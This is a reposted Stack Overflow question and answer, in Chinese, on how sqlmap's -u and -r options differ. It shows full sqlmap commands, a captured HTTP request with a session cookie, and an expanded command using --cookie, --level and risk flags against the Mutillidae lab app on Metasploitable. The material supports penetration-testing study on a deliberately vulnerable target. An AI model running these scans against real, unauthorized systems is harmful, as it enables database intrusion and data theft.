gpt4 book ai didi

linux - SQLmap:-u 和-r 命令的用法

转载 作者:太空宇宙 更新时间:2023-11-04 12:06:15 25 4
gpt4 key购买 nike

注意:在 METASPLOITABLE 的 Mutillidae 上尝试过

我试图使用 SQLmap 注入(inject) mutilidae 的“用户信息”页面。

我已经尝试过手动注入(inject),易受攻击的参数是 USERNAME 和 PASSWORD。

当我在 SQLmap 上使用 -u 命令时,只有参数 PAGE 被 SQLmap 视为 GET 参数,这反过来(如预期的那样)导致它说 url 不可注入(inject)。

稍后在使用 Burp 代理并通过 -r 请求命令运行 SQLmap 后,对于完全相同的 URL,一切正常。

我很困惑这两个命令是如何工作的,以及在 -r 命令中提供了什么可以成功注入(inject),但我提供的 -u URL 中没有。

什么时候应该使用哪个命令?

使用-u命令检查漏洞

sqlmap -u http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details

使用-r命令

sqlmap -r /root/Desktop/user.request

user.request 包含以下内容:

GET /mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: xxx.xxx.2.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 31 May 2018 06:13:15 GMT

最佳答案

您似乎缺少 -u 部分中的 cookie:

Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1

将以下参数添加到您的命令中:

sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=cb55bd05e9618af173600ba757e996c1" -u 'http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details' --level=5 risk=3

级别和风险是极端的,迫使 Sqlmap 使用它所拥有的几乎所有东西来测试您的客户端机器......在这个特定的上下文中,您并不真正需要它们,但了解它是件好事。

如果你想指定一个你希望Sqlmap测试的参数使用-p选项例如:

-p username

最后回答问题的第二部分,什么时候应该使用 -r 还是 -u,这确实是用户的选择,您可能会发现将 HTTP 信息转储到文件中并直接从中读取更方便( -r 的主要用法)或者您可能会发现您希望更好地控制发送的内容并希望在命令行上对其进行调整(-u 的主要用法)

关于linux - SQLmap:-u 和-r 命令的用法,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/50618497/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com